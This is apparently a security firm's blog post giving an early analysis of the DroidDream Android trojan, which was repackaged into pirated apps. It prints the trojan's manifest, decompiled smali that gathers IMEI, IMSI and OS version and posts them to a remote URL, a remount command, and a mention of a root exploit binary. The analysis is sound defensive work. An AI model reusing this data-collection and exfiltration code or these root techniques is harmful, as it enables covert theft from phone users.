AegisLab Security Blog - English

     A latest Android Trojan named "DroidDream" was discovered by mobile security company Lookout Inc. today. This trojan pirates legal application and repacks it as a new one and the malware writer(s) published in Google's offical Android market. More than 50 applications were suffered such attack and now illegally modified ones were pulled out from the market.

     With the collection of published applications in the Google market, other local markets and websites, we did a brief and quick analysis on the samples we have. More detailed information will be updated as the investigation goes on.

     At first, the infected application didn't request too much privilege so the user may not notice any abnormal. For example,

AndroidManifest.xml: <!-- Only a few privileges are required --> <uses-permission android:name="android.permission.READ_PHONE_STATE" /> <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" /> <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" /> <uses-permission android:name="android.permission.INTERNET" />         <activity android:name="com.android.root.main             <intent-filter>                 <!-- Intercept the launch activity -->                 <action android:name="android.intent.action.MAIN" />                 <category android:name="android.intent.category.LAUNCHER" />             </intent-filter>         </activity>         <service android:name="com.android.root.Setting" android:process=":remote" />         <service android:name="com.android.root.AlarmReceiver" android:process=":remote2" />

     Unpack the package, we can found some additional codes were added.

smali/jackpal/androidterm: Exec.smali smali/com/android/root: adbRoot$1.smali  adbRoot.smali  AlarmReceiver$1.smali  AlarmReceiver.smali  main.smali  Setting$1.smali  Setting$2.smali  Setting.smali  udevRoot.smali lib/armeabi: libandroidterm.so

     It utilizes JNI, so make the analysis a bit harder.

Exec.smali -> Exec.java : package jackpal.androidterm; import java.io.FileDescriptor; public class Exec {   static   {     System.loadLibrary("androidterm"); //it calls JNI library "libandroidterm.so"   } }

The collected personal data is stored in local Setting.smali,

Setting.smali:  784     .line 306  785     .local v1, fm:Ljava/util/Formatter;  786     const/4 v2, 0x5  787  788     new-array v2, v2, [Ljava/lang/Object;  789  790     const/4 v3, 0x0  791  792     const-string v4, "502"  793  794     aput-object v4, v2, v3  795  796     const/4 v3, 0x1  797  798     const-string v4, "10028"           //trojan version  799  800     aput-object v4, v2, v3  801  802     const/4 v3, 0x2  803     //collect mobile IMEI  804     invoke-static {p1}, Lcom/android/root/adbRoot;->getIMEI(Landroid/content/Context;)Ljava/lang/String;  805  806     move-result-object v4  807  808     aput-object v4, v2, v3  809  810     const/4 v3, 0x3  811     //collect mobile IMSI  812     invoke-static {p1}, Lcom/android/root/adbRoot;->getIMSI(Landroid/content/Context;)Ljava/lang/String;  813  814     move-result-object v4  815  816     aput-object v4, v2, v3  817  818     const/4 v3, 0x4  819  820     new-instance v4, Ljava/lang/StringBuilder;  821  822     sget-object v5, Landroid/os/Build;->DEVICE:Ljava/lang/String;  823  824     invoke-static {v5}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;  825  826     move-result-object v5  827  828     invoke-direct {v4, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V  829  830     const-string v5, ":"  831  832     invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;  833  834     move-result-object v4  835  836     sget v5, Landroid/os/Build$VERSION;->SDK_INT:I            //collect mobile android system version  837  838     invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;  839  840     move-result-object v4  841  842     invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;  843  844     move-result-object v4  845  846     aput-object v4, v2, v3  847  848     invoke-virtual {v1, v0, v2}, Ljava/util/Formatter;->format(Ljava/lang/String;[Ljava/lang/Object;)Ljava/util/Formatter;        ....  855     .end local v0           #data:Ljava/lang/String;  856     invoke-virtual {v0}, Ljava/lang/String;->getBytes()[B  857  858     move-result-object v1  859  860     .line 308  861     .local v1, buff:[B  862     invoke-static {v1}, Lcom/android/root/adbRoot;->crypt([B)V    //Should have encrypted, but local backup didn't  863  864     .line 311  865     new-instance v0, Ljava/net/URL;  866  867     invoke-direct {v0, p0}, Ljava/net/URL;-><init>(Ljava/lang/String;)V  868  869     .line 312  870     .local v0, aURL:Ljava/net/URL;  871     invoke-virtual {v0}, Ljava/net/URL;->openConnection()Ljava/net/URLConnection;  872  873     move-result-object p0  874  875     .end local p0  876     check-cast p0, Ljava/net/HttpURLConnection;  877  878     .line 313  879     .local p0, aConnection:Ljava/net/HttpURLConnection;  880     const/4 v0, 0x1  881  882     invoke-virtual {p0, v0}, Ljava/net/HttpURLConnection;->setDoOutput(Z)V        ....  989     .line 344  990     const-string p0, "pref_config_setting"               //write log into data/data/droiddream/com.droiddream.lovePositions/shared_prefs/pref_config_setting.xml  991  992     const/4 v0, 0x0  993  994     invoke-virtual {p1, p0, v0}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;  995  996     .end local v0           #bao:Ljava/io/ByteArrayOutputStream;  997     move-result-object p0  998  999     invoke-interface {p0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor; 1000 1001     move-result-object p0 1002 1003     .line 345 1004     .local p0, editor:Landroid/content/SharedPreferences$Editor; 1005     const-string p1, "done"

    From the LogCat, it tries to connect to http://www.umeng.com/app_logs, whois information about umeng.com points to Bejing registrant. The website is an statistic counting service for applications. Seems harmless at first glance.

    It will collect IMEI, IMSI, SDK version, Android OS version, language and etc, and stores to /data/data/droiddream/com.droiddream.lovePositions/shared_prefs/mobclick_agent_header_com.droiddream.lovePositions.xml

    In /data/data/droiddream/com.droiddream.lovePositions/files:

remount_data.sh  remount_sys_ro.sh  remount_sys_rw.sh

The remount_xxx.sh attempts to mount its space to /data, and let itself can access the stored files generated by other applications. The command is similiar to the below.

mount -o remount,rw,nosuid,nodev -t yaffs2 /dev/block/mtdblock1 /data

     It also collects the information under /proc, and stores to /data/data/droiddream/com.droiddream.lovePositions/files/proc

     The snippet of /data/data/droiddream/com.droiddream.lovePositions/files/rageagainstthecage was shown as below figure.

      Check the fie attribute and type of rageagainstthecage, we found: 

    Obviously it's an exectuable file.

    Inside it, the /proc/%d/cmdline is the same way as the code in (http://hiapk.com/viewthread.php?action=printable&tid=585198), so it should be some attempt to root the system. However, we are not sure the intention to root and the actions after root, there are many codes need further analysis. Stay tuned!

By AegisLab.

Analyzer: Zod Lin